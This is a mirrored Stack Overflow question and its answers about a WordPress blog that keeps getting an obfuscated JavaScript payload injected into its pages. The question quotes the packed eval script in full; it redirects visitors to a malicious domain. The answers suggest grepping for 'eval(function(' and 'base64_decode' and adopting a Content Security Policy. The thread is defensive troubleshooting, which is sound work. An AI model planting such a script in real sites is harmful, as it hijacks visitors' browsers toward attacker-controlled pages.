Javascript Injection prevention on Wordpress

我与影子孤独终老i 提交于 2019-12-10 18:23:56

问题


My blog on wordpress gets the following malicious script injected:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))

It navigates to:

  • http://oxxtm.com/ which redirects to:
    • http://www.html5website.com/

I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation:

  • Akismet
  • Captcha on Login
  • Free & Simple Contact Form Plugin - PirateForms (it is recommended by my Zerif Lite theme)
  • SMTP Mailer
  • WooCommerce

If I can't find the rootcause, would you recomend handling the "redirect" event to keep the site running? If so how could I handle if there is a redirect pointing to http://oxxtm.com/ and abort it using javascript?

I tried using the onunload and onbeforeunload events but it seems like the injected eval, runs before the event manipulation is even registered.

I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.

I already removed the malicious script several times, but it gets injected again & again. I need to treat the symptom while I search for the cause or the site will be out of service. However, I don't understand how the script is injected in the first place.


回答1:


Search with in all your files the following content: eval(function()

It will show you every files that contains this code.

Otherwise, try to search this: base64_decode

This is a function that permit to decode a base64-encoded text, which is often used by malicious PHP files to inject some code that you can't detect by searching eval(

If the problem persists, answer here and I'll try to help you.




回答2:


Also, as additional feature to protect your client-side from XSS like that, i can suggest you to use CSP after cleaning your backend from injection. You can read more about it: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver-bullet, but nice to have it for protection of users.



来源:https://stackoverflow.com/questions/38161647/javascript-injection-prevention-on-wordpress

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!